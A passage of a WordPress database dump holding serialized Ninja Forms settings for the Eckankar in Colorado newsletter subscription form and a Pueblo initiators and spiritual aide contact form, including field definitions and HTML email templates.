Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_318\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:113:\"Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>\";s:9:\"field_key\";s:19:\"listmultiselect_318\";}s:2:\"id\";i:229;}i:7;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:311:\"<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>\r\n<i>or Download the Membership flyer<a href=\"https://eckankar-colorado.org/wp-content/uploads/2016/01/Advanced-Spiritual-Study-Inside-and-outside.pdf\" target=\"_blank\"> Here.</i></a>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:135:\"<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>&nbsp;\";s:3:\"key\";s:8:\"html_313\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_313\";}s:2:\"id\";i:230;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800642906\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"635\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_315\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_315\";}s:2:\"id\";i:232;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:53\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"subs_expire_time\";s:2:\"90\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:81;}i:1;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:53\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_309}\";s:13:\"email_subject\";s:33:\"Eckankar In Colorado - Newsletter\";s:13:\"email_message\";s:3551:\"<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 2px\" width=\"100%\" valign=\"top\" bgcolor=\"#cccccc\"><!-- Start Header--><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td width=\"100%\" height=\"102\" bgcolor=\"#cccccc\"><!-- Logo --><table class=\"deviceWidth\" width=\"478\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"padding-left: 10px;color: #23507d\" width=\"478\" height=\"102\"><p style=\"font-size: 20pt;letter-spacing: .05em\"><strong>Eckankar In Colorado</strong> <br style=\"font-size: 18pt;letter-spacing: .05em\"> Public Newsletter Subscription</p><p style=\"color: #333333;font-size: 14pt;letter-spacing: 0.03em;line-height: 10px\"><strong><em> Your Newsletter Subscription Confirmation</em></strong></p></td></tr></tbody></table><!-- End Logo --> <!-- Nav --><!-- End Nav --></td></tr></tbody></table><!-- End Header --> <!-- One Column --><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" bgcolor=\"#eeeeed\" align=\"center\"><tbody><tr><td style=\"padding: 3px;background-color: #23507d\" valign=\"top\"> </td></tr><tr><td style=\"font-size: 13px;color: #333333;font-weight: normal;text-align: left;font-family: Georgia, Times, serif;line-height: 24px;vertical-align: top;padding: 2px 10px 0px 8px\" bgcolor=\"#eeeeed\"><p style=\"font-size: 14px\"><strong>Hello {field:textbox_307}!   Thank You For Subscribing!</strong></p><p>We\'re happy that you have signed up to receive the Eckankar in Colorado Newsletter(s). You will find each publication filled with all the latest news and events for the entire state. The most current edition will be in your inbox soon!</p><p>You have subscribed to the following newsletter(s):</p><p><strong>{field:listmultiselect_318}</strong></p><p>Happy to have you on board.</p><p>Warm Regards,<br> <em>The Eckankar in Colorado Newsletter Team</em></p></td></tr></tbody></table><!-- End One Column --><!-- spacer --> <!-- 2 Column Images & Text Side by SIde --><!-- End 2 Column Images & Text Side by SIde --><!-- spacer --> <!-- Two Column (Images Stacked over Text) --><!-- End Two Column (Images Stacked over Text) --><!-- spacer --> <!-- Dark Background, Three Column Images --> <!-- 3 Small Images --><!-- End 3 Small Images --> <!-- Dark Background, Three Column Images --><!-- spacer --> <!-- 2 Column Images - text left --><!-- End 2 Column Images  - text left --><div style=\"height: 6px\"> </div><!-- spacer --> <!-- Blog Headlines --><!-- end blog headlines --> <!-- 4 Columns --><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 12px 0\" bgcolor=\"#363636\"><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"font-size: 10pt;color: #999;font-family: Arial, sans-serif;padding-bottom: 0px\" valign=\"top\" height=\"50\"><p>You are receiving this email because you subscribed via <a href=\"https://www.eckankar-colorado.org\" style=\"color: #999;text-decoration: underline\"> The Eckankar in Colorado Website</a></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!-- End 4 Columns --></td></tr></tbody></table>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:82;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:53\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:577:\"<div style=\"text-align: center\"> </div><h2 style=\"text-align: center\"><span style=\"color: #23507d\"><strong>Thank you for subscribing to the Eckankar in Colorado Newsletter!</strong></span></h2><div style=\"text-align: center\"> </div><div style=\"text-align: center\">You will be receiving an email confirmation of your subscription(s) and your newsletter(s) will arrive in your email inbox very soon.</div><div style=\"text-align: center\"> </div><div style=\"text-align: center\"><br> <em>The Eckankar in Colorado Newsletter Team</em></div><div style=\"text-align: center\"> </div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:15:\"submitter_email\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:83;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:53\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:40:\"Eckankar In Colorado - Newsletter Signup\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:32:\"co.eck.dba@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:2707:\"<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td>                                \"><h2><span style=\"color: #23507d;\">Eckankar In Colorado - Public Newsletter Subscription<br></span></h2></td><td> </td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><p><strong>Hello! You have a new \"Eckankar in Colorado Public Newsletter\" form submission.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this email because you are listed as the contact to receive these new Newsletter subscription requests.</p><p>The following person has requested a <b>PUBLIC</b> subscription. </p></td></tr></tbody></table><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td>                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_307}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_308}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_309}<br> <strong>STATE</strong></span><span style=\"color: #333333\"><strong>:</strong> {field:listselect_316}<br> </span><span style=\"color: #333333\"><strong>COUNTRY</strong></span><span style=\"color: #333333\"><strong>:</strong> {field:listcountry_317}<br> <strong>SUBSCRIPTION(S):</strong> {field:listmultiselect_318}<strong><br> </strong></span><span style=\"color: #333333\"><strong>ECK MEMBER?:</strong> </span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:84;}}s:8:\"settings\";a:31:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:1:\"1\";s:5:\"title\";s:30:\"Public Newsletter Subscription\";s:10:\"created_at\";s:19:\"2019-07-15 14:07:18\";s:10:\"form_title\";s:30:\"Public Newsletter Subscription\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-09-20 16:31:57\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"87\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_306\";i:1;s:11:\"textbox_307\";i:2;s:12:\"lastname_308\";i:3;s:9:\"email_309\";i:4;s:14:\"listselect_316\";i:5;s:15:\"listcountry_317\";i:6;s:19:\"listmultiselect_318\";i:7;s:8:\"html_313\";i:8;s:18:\"html_1663800642906\";i:9;s:10:\"submit_315\";}s:14:\"drawerDisabled\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00);
INSERT INTO `wpcl_nf3_upgrades` VALUES (22,'a:7:{s:2:\"id\";i:22;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1247:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1252:\"<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_177\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_177\";}s:2:\"id\";i:233;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_178\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_178\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:234;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"de